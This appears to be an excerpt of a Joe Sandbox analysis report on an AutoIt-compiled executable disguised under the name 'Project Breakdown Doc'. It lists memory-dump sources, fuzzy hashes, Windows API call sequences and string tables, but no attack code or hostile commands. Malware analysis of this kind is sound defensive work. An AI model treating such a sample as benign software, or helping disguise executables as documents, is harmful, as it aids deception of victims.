                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 76241b8f322880a8de678f1568d38dba3d870b950389d2c217066a9de3c11825
                                                  • Instruction ID: 8cd968c54b85ae52c835287eac275d7de6a228eca1e8a79fca7cc7da4375848b
                                                  • Opcode Fuzzy Hash: 76241b8f322880a8de678f1568d38dba3d870b950389d2c217066a9de3c11825
                                                  • Instruction Fuzzy Hash: AAA0123000010CB78A001B41EC049487F5DD6401907004020F40C40031873255114580
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcbb1b4c3a21659762f721757aa47216faf61e0bf88925e4913d301fa2e77402
                                                  • Instruction ID: 141e32c2aa312d97d274c576d423afb903669e3c8804af66bafcf68efdbbe07e
                                                  • Opcode Fuzzy Hash: dcbb1b4c3a21659762f721757aa47216faf61e0bf88925e4913d301fa2e77402
                                                  • Instruction Fuzzy Hash: D9223734901616CBDF29CB19C48867D77A1FB41341F24446ADC62AB291DB30EFCDCB69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: d4fe4969bb5e7c31c5b46747ee17d9088feaa88eb6f721ac007f92f0841f0558
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: CCC1813220559309DB3D467AD4B453FBAE15BA27B231E076DE8B3CB5D4EF20D624E620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 1367f411c138ff5326849e88d8103c7e059138dc4978a01504b4b23194781c2e
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: AEC185322055930ADB3D467A84B403FBBE15B927B231E076DE8B3DB5D5EF10D624E620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: f2306249fcb0940935d3fbe8845c756824ae2d3778b4186bfacc586ee8c4a9dc
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 64C1503220519309DB7D467A94B413FBAE15BA27B331E076DECB2CB5D4EF20D624E620
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                  • Instruction ID: 79d2c77fb9e01bb67bae698e787278ca355e31ba0d11c2700525c0b43efadafa
                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                  • Instruction Fuzzy Hash: 6C41C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                  • Instruction ID: b3a612bc2bcd283b6c7a7ac9cf27b0f3c08e91d44b460ebd76cd4e5faa602ecd
                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                  • Instruction Fuzzy Hash: B0019278A00109EFCB45EFA8C5909AEF7B5FB48710F208599D809A7701D730EE41DB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                  • Instruction ID: ef7ebca6cf2a552c6290da6c74a1a6886b4b69600b694ce6d1305e5fbec267bd
                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                  • Instruction Fuzzy Hash: 79019278A00109EFCB45EF9CC5909AEF7B5FB48710F608599E809A7701D734EE41DB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00CB7B70
                                                  • DeleteObject.GDI32(00000000), ref: 00CB7B82
                                                  • DestroyWindow.USER32 ref: 00CB7B90
                                                  • GetDesktopWindow.USER32 ref: 00CB7BAA
                                                  • GetWindowRect.USER32(00000000), ref: 00CB7BB1
                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CB7CF2
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CB7D02
                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7D4A
                                                  • GetClientRect.USER32(00000000,?), ref: 00CB7D56
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CB7D90
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DB2
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DC5
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DD0
                                                  • GlobalLock.KERNEL32(00000000), ref: 00CB7DD9
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DE8
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CB7DF1
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DF8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00CB7E03
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7E15
                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CD2CAC,00000000), ref: 00CB7E2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00CB7E3B
                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CB7E61
                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CB7E80
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7EA2
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB808F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: 342f260d774b5a88cd2cfde9eeb7170426f482c849d7f2af03a9a47869fc1951
                                                  • Instruction ID: cf9962d13f760ea82ed4ba56752e5532e4203bc86b978aeb5e01a0949ffd57db
                                                  • Opcode Fuzzy Hash: 342f260d774b5a88cd2cfde9eeb7170426f482c849d7f2af03a9a47869fc1951
                                                  • Instruction Fuzzy Hash: 2D022A71A00219EFDB14DFA4DD89FAE7BB9FB48310F148559F915AB2A1CB70AD01CB60
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00CCF910), ref: 00CC38AF
                                                  • IsWindowVisible.USER32(?), ref: 00CC38D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: 56073eec9493f13c584a4269db20f512b67a2cfa53b7379db96d62bddf689569
                                                  • Instruction ID: c8f47c62fb4ebf7f081c6847f1613999b660ffc63bc253659fe91881e04c57f9
                                                  • Opcode Fuzzy Hash: 56073eec9493f13c584a4269db20f512b67a2cfa53b7379db96d62bddf689569
                                                  • Instruction Fuzzy Hash: FAD16F702043459BCB24EF11D495F6E7BA5EF94344F10855CF9966B3A2CB31EE0AEB82
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00CCA89F
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CCA8D0
                                                  • GetSysColor.USER32(0000000F), ref: 00CCA8DC
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00CCA8F6
                                                  • SelectObject.GDI32(?,?), ref: 00CCA905
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCA930
                                                  • GetSysColor.USER32(00000010), ref: 00CCA938
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00CCA93F
                                                  • FrameRect.USER32(?,?,00000000), ref: 00CCA94E
                                                  • DeleteObject.GDI32(00000000), ref: 00CCA955
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00CCA9A0
                                                  • FillRect.USER32(?,?,?), ref: 00CCA9D2
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CCA9FD
                                                    • Part of subcall function 00CCAB60: GetSysColor.USER32(00000012), ref: 00CCAB99
                                                    • Part of subcall function 00CCAB60: SetTextColor.GDI32(?,?), ref: 00CCAB9D
                                                    • Part of subcall function 00CCAB60: GetSysColorBrush.USER32(0000000F), ref: 00CCABB3
                                                    • Part of subcall function 00CCAB60: GetSysColor.USER32(0000000F), ref: 00CCABBE
                                                    • Part of subcall function 00CCAB60: GetSysColor.USER32(00000011), ref: 00CCABDB
                                                    • Part of subcall function 00CCAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCABE9
                                                    • Part of subcall function 00CCAB60: SelectObject.GDI32(?,00000000), ref: 00CCABFA
                                                    • Part of subcall function 00CCAB60: SetBkColor.GDI32(?,00000000), ref: 00CCAC03
                                                    • Part of subcall function 00CCAB60: SelectObject.GDI32(?,?), ref: 00CCAC10
                                                    • Part of subcall function 00CCAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00CCAC2F
                                                    • Part of subcall function 00CCAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCAC46
                                                    • Part of subcall function 00CCAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00CCAC5B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: ea26351a81fc1dfb7237ce567fcb1ce77ecd030a76a839b91dc07e4af7c39236
                                                  • Instruction ID: acce15311d984d311d39dca057199d5269301c1f54872ff877b08d1a1011c2e5
                                                  • Opcode Fuzzy Hash: ea26351a81fc1dfb7237ce567fcb1ce77ecd030a76a839b91dc07e4af7c39236
                                                  • Instruction Fuzzy Hash: A8A17C72408305AFD7109F64DC08F6F7BAAFB88325F144A2DFAA2961E0D771D946CB52
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00C42CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00C42CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00C42CF3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00C42CFE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00C42D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C7C68B
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C7C6C4
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C7CAED
                                                    • Part of subcall function 00C41B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C42036,?,00000000,?,?,?,?,00C416CB,00000000,?), ref: 00C41B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 00C7CB2A
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C7CB41
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C7CB57
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C7CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: bc0658838354070f8d0c06ab909cd1c6f66f2eee8540e93d5d1f03f4773ddf1c
                                                  • Instruction ID: 2405265303ef605cbd08a2cdeee3b429bd06b9e0c3bb0b6a0efb4ec8dfbe8502
                                                  • Opcode Fuzzy Hash: bc0658838354070f8d0c06ab909cd1c6f66f2eee8540e93d5d1f03f4773ddf1c
                                                  • Instruction Fuzzy Hash: 88128D30604202EFDB24CF24C8C5BA9BBE5BF45311F54856DF9A9DB262CB31E942DB91
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00CB77F1
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CB78B0
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CB78EE
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CB7900
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CB7946
                                                  • GetClientRect.USER32(00000000,?), ref: 00CB7952
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CB7996
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CB79A5
                                                  • GetStockObject.GDI32(00000011), ref: 00CB79B5
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00CB79B9
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CB79C9
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB79D2
                                                  • DeleteDC.GDI32(00000000), ref: 00CB79DB
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CB7A07
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CB7A1E
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CB7A59
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CB7A6D
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CB7A7E
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CB7AAE
                                                  • GetStockObject.GDI32(00000011), ref: 00CB7AB9
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CB7AC4
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CB7ACE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: e11345d94ed59b781836872566fbd8d909b8a052754d690ea4fcd8b47d2fc330
                                                  • Instruction ID: e798d187871d718959024094436cf6750058d9ee7b60213b0c33c78792fc8f63
                                                  • Opcode Fuzzy Hash: e11345d94ed59b781836872566fbd8d909b8a052754d690ea4fcd8b47d2fc330
                                                  • Instruction Fuzzy Hash: 0DA140B1A40215BFEB14DBA4DC4AFAE7BBAEB44710F004118FA15E72E0D7B4AD11CB64
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAAF89
                                                  • GetDriveTypeW.KERNEL32(?,00CCFAC0,?,\\.\,00CCF910), ref: 00CAB066
                                                  • SetErrorMode.KERNEL32(00000000,00CCFAC0,?,\\.\,00CCF910), ref: 00CAB1C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: facdbe6ed014d655ca9a86338ed85b87feae4e77b3c4d6116abe4fb537593677
                                                  • Instruction ID: bf9dc511ca5ea9578e2a2325ed8ecaa181d526538616ad7872e9ec6affbef257
                                                  • Opcode Fuzzy Hash: facdbe6ed014d655ca9a86338ed85b87feae4e77b3c4d6116abe4fb537593677
                                                  • Instruction Fuzzy Hash: F751B57068430BAB8B04EB91CD92D7DB7B1FB563497204026F61EA7292C775AE41EB43
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: dad984c2f894ecce2ca0f4826c9b48dd2aef8ee319fe622647b5862b123f2bc0
                                                  • Instruction ID: 40bb85ea51fa8f1daea39a6cea6d03b40f040574a956252090e2ac87446d75eb
                                                  • Opcode Fuzzy Hash: dad984c2f894ecce2ca0f4826c9b48dd2aef8ee319fe622647b5862b123f2bc0
